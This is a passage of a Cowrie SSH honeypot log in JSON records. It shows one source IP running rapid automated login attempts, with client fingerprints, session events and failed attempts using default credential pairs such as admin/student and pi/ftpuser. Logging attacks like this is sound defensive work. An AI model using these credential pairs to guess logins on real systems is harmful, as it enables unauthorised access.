nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.706337Z","src_ip":"212.227.125.160","session":"481581685f08"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.708440Z","src_ip":"212.227.125.160","session":"670814afb3a5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"student","message":"login attempt [admin/student] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.838501Z","src_ip":"212.227.125.160","session":"481581685f08"}
{"eventid":"cowrie.login.failed","username":"noc","password":"student","message":"login attempt [noc/student] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:44.839646Z","src_ip":"212.227.125.160","session":"670814afb3a5"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.011516Z","src_ip":"212.227.125.160","session":"c347a78f82c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55192,"dst_ip":"1.2.3.4","dst_port":22,"session":"5be6e6ea102d","protocol":"ssh","message":"New connection: 212.227.125.160:55192 (1.2.3.4:22) [session: 5be6e6ea102d]","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.053438Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.054120Z","src_ip":"212.227.125.160","session":"5be6e6ea102d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.096891Z","src_ip":"212.227.125.160","session":"5be6e6ea102d"}
{"eventid":"cowrie.login.failed","username":"pi","password":"student","message":"login attempt [pi/student] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.228826Z","src_ip":"212.227.125.160","session":"5be6e6ea102d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.248840Z","src_ip":"212.227.125.160","session":"26b5726a402b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55202,"dst_ip":"1.2.3.4","dst_port":22,"session":"63d9fae5beef","protocol":"ssh","message":"New connection: 212.227.125.160:55202 (1.2.3.4:22) [session: 63d9fae5beef]","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.290212Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.290970Z","src_ip":"212.227.125.160","session":"63d9fae5beef"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.333229Z","src_ip":"212.227.125.160","session":"63d9fae5beef"}
{"eventid":"cowrie.login.failed","username":"student","password":"ftpuser","message":"login attempt [student/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.461259Z","src_ip":"212.227.125.160","session":"63d9fae5beef"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.613066Z","src_ip":"212.227.125.160","session":"6d59f2996e12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55204,"dst_ip":"1.2.3.4","dst_port":22,"session":"605ede3938d6","protocol":"ssh","message":"New connection: 212.227.125.160:55204 (1.2.3.4:22) [session: 605ede3938d6]","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.654965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.655630Z","src_ip":"212.227.125.160","session":"605ede3938d6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.690650Z","src_ip":"212.227.125.160","session":"4e7566e432d1"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.694268Z","src_ip":"212.227.125.160","session":"3b9ee4ed073a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.699747Z","src_ip":"212.227.125.160","session":"605ede3938d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55210,"dst_ip":"1.2.3.4","dst_port":22,"session":"886d668fe13a","protocol":"ssh","message":"New connection: 212.227.125.160:55210 (1.2.3.4:22) [session: 886d668fe13a]","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.734640Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55218,"dst_ip":"1.2.3.4","dst_port":22,"session":"68bceffc78e5","protocol":"ssh","message":"New connection: 212.227.125.160:55218 (1.2.3.4:22) [session: 68bceffc78e5]","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.737029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.742780Z","src_ip":"212.227.125.160","session":"886d668fe13a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.743301Z","src_ip":"212.227.125.160","session":"68bceffc78e5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.779014Z","src_ip":"212.227.125.160","session":"886d668fe13a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.780842Z","src_ip":"212.227.125.160","session":"68bceffc78e5"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.837867Z","src_ip":"212.227.125.160","session":"605ede3938d6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.884216Z","src_ip":"212.227.125.160","session":"670814afb3a5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.884958Z","src_ip":"212.227.125.160","session":"481581685f08"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55228,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b328e50cc1e","protocol":"ssh","message":"New connection: 212.227.125.160:55228 (1.2.3.4:22) [session: 9b328e50cc1e]","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.925353Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55244,"dst_ip":"1.2.3.4","dst_port":22,"session":"7423d5b6cfe9","protocol":"ssh","message":"New connection: 212.227.125.160:55244 (1.2.3.4:22) [session: 7423d5b6cfe9]","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.927016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.927557Z","src_ip":"212.227.125.160","session":"7423d5b6cfe9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.928107Z","src_ip":"212.227.125.160","session":"9b328e50cc1e"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ftpuser","message":"login attempt [ubnt/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.949608Z","src_ip":"212.227.125.160","session":"886d668fe13a"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.958154Z","src_ip":"212.227.125.160","session":"68bceffc78e5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.970763Z","src_ip":"212.227.125.160","session":"9b328e50cc1e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:45.973897Z","src_ip":"212.227.125.160","session":"7423d5b6cfe9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ftpuser","message":"login attempt [admin/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:46.112762Z","src_ip":"212.227.125.160","session":"7423d5b6cfe9"}
{"eventid":"cowrie.login.failed","username":"noc","password":"ftpuser","message":"login attempt [noc/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:46.242214Z","src_ip":"212.227.125.160","session":"9b328e50cc1e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:46.273522Z","src_ip":"212.227.125.160","session":"5be6e6ea102d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55254,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b06b9f30165","protocol":"ssh","message":"New connection: 212.227.125.160:55254 (1.2.3.4:22) [session: 3b06b9f30165]","sensor":"my-vps","timestamp":"2025-08-31T07:06:46.325790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:46.327095Z","src_ip":"212.227.125.160","session":"3b06b9f30165"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:46.388265Z","src_ip":"212.227.125.160","session":"3b06b9f30165"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:46.528054Z","src_ip":"212.227.125.160","session":"63d9fae5beef"}
{"eventid":"cowrie.login.failed","username":"pi","password":"ftpuser","message":"login attempt [pi/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:46.570868Z","src_ip":"212.227.125.160","session":"3b06b9f30165"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55256,"dst_ip":"1.2.3.4","dst_port":22,"session":"07f06f2c33e8","protocol":"ssh","message":"New connection: 212.227.125.160:55256 (1.2.3.4:22) [session: 07f06f2c33e8]","sensor":"my-vps","timestamp":"2025-08-31T07:06:46.592547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:46.606790Z","src_ip":"212.227.125.160","session":"07f06f2c33e8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:46.672718Z","src_ip":"212.227.125.160","session":"07f06f2c33e8"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:46.905416Z","src_ip":"212.227.125.160","session":"605ede3938d6"}
{"eventid":"cowrie.login.failed","username":"student","password":"noc","message":"login attempt [student/noc] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:46.946110Z","src_ip":"212.227.125.160","session":"07f06f2c33e8"}
